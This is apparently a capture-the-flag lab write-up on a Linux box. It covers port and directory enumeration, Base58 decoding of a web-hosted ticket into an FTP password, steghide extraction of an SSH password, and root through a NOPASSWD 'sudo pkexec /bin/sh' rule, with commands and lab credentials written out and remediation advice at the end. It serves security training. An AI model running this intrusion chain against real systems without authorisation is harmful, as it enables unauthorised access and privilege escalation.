Case file

Base58 ticket, FTP stego chain, and sudo pkexec root

Foundations Linux engagement: island path enumeration and Base58 decoding unlocked FTP; steghide and zip contents yielded slade’s SSH password; sudo pkexec completed root.

Foundations26 minLinux · FTP · Stego · Privilege Escalation
  • Web enum under /island produced a Base58 ticket for FTP. Stego extraction recovered slade’s password; NOPASSWD pkexec spawned a root shell.

  • green_arrow.ticket Base58-decoded to the FTP password for vigilante.

  • steghide passphrase password extracted shado; SSH as slade with M3tahuman.

  • NOPASSWD pkexec spawned /bin/sh as root.

01

Engagement summary

Web enum under /island produced a Base58 ticket for FTP. Stego extraction recovered slade’s password; NOPASSWD pkexec spawned a root shell.

LIAN YU (10.49.161.195) exposed FTP, SSH, HTTP, and RPC. Directory brute force found /island/2100/green_arrow.ticket; Base58 decoding of RTy8yhBQdscX produced !#th3h00d for FTP user vigilante. Downloaded images included a repaired PNG passphrase password; steghide on aa.jpg extracted ss.zip containing shado with M3tahuman. SSH as slade succeeded. sudo -l allowed /usr/bin/pkexec; sudo pkexec /bin/sh returned root.

Business impact

Encoded tickets in web trees are still credentials. Stego on FTP shares and weak SSH passwords complete the foothold. Unrestricted pkexec via sudo is root. Remove secrets from static content, authenticate FTP, and never grant pkexec NOPASSWD.

02

Island enum and FTP access

green_arrow.ticket Base58-decoded to the FTP password for vigilante.

OPERATOR · WEB / FTP

savvy@lab:~$ nmap -sV -sC 10.49.161.195

21/tcp open ftp

22/tcp open ssh

80/tcp open http

savvy@lab:~$ dirsearch -u http://10.49.161.195/island/2100 -e .ticket

/island/2100/green_arrow.ticket

# Base58 RTy8yhBQdscX → !#th3h00d

savvy@lab:~$ ftp 10.49.161.195

Name: vigilante

ftp> get aa.jpg

03

Stego to slade SSH

steghide passphrase password extracted shado; SSH as slade with M3tahuman.

OPERATOR · STEGO / SSH

savvy@lab:~$ steghide extract -sf aa.jpg -p password

wrote extracted data to ss.zip

savvy@lab:~$ unzip ss.zip && cat shado

M3tahuman

savvy@lab:~$ ssh slade@10.49.161.195

savvy@lab:~$

04

sudo pkexec to root

NOPASSWD pkexec spawned /bin/sh as root.

OPERATOR · ROOT

savvy@lab:~$ sudo -l

(root) NOPASSWD: /usr/bin/pkexec

savvy@lab:~$ sudo pkexec /bin/sh

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Do not publish encoded credentials on web paths. Restrict FTP and scrub stego-capable media. Remove pkexec from sudoers; use least-privilege named commands only.